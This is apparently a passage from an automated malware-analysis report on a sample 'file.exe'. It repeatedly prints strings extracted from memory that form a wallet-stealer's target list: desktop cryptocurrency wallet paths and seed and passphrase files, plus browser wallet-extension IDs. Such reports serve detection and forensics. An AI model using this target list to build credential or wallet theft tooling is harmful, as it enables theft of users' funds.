Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000002.1822925903.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: MetaMask|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|Binance Wallet|fhbohimaelbohpjbbldcngcnapndodjp|1|0|0|Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase Wallet extension|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|0|Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne|1|0|0|iWallet|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|1|0|0|GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj|1|0|0|Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra Station Wallet|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|1|0|0|Auro Wallet(Mina Protocol)|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98 Wallet|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain Wallet|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Brave Wallet|odbfpeeihdkbihmopkbjmoonfanlbfcl|1|0|0|Oxygen|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|Pali Wallet|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|BOLT X|aodkkagnadcbobfpggfnjeongemjbjca|1|0|0|XDEFI Wallet|hmeobnfnfcmdkdcmlblgagmfpfboieaf|1|0|0|Nami|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Maiar DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm|1|0|0|Keeper Wallet|lpilbniiabackdjcionkobglmddfbcjo|1|0|0|Solflare Wallet|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc|1|0|0|Goby|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|Ronin Wallet|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|Byone|nlgbhdfgdhgbiamfdfmbikcdghidoadd|1|0|0|OneKey|jnmbobjmhlngoefaiojfljckilhhlhcj|1|0|0|DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik|1|0|0|SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmeid|1|0|0|Braavos Wallet|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|kkpllkodjeloidieedojogacfhpaihoh|1|1|1|OKX Wallet|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender Wallet|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|Eternl|kmhcihpebfmpgmihbkipmjlmmioameka|1|0|0|Pontem Aptos Wallet|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Petra Aptos Wallet|ejjladinnckdgjemekebdpeokbikhfci|1|0|0|Martian Aptos Wallet|efbglgofoippbgcjepnhiblaibcnclgk|1|0|0|Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra Wallet|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk|1|0|0|Authenticator|bhghoamapcdpbohphigoooaddinpkbai|1|0|0|
                        Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000002.1822925903.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json
                        Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000002.1822925903.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json
                        Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000002.1822925903.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json
                        Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000002.1822925903.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 81.77rs\user\AppData\Roaming\\Coinomi\Coinomi\wallets\\*.*n8
                        Source: file.exe, 00000000.00000002.1822925903.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json
                        Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger 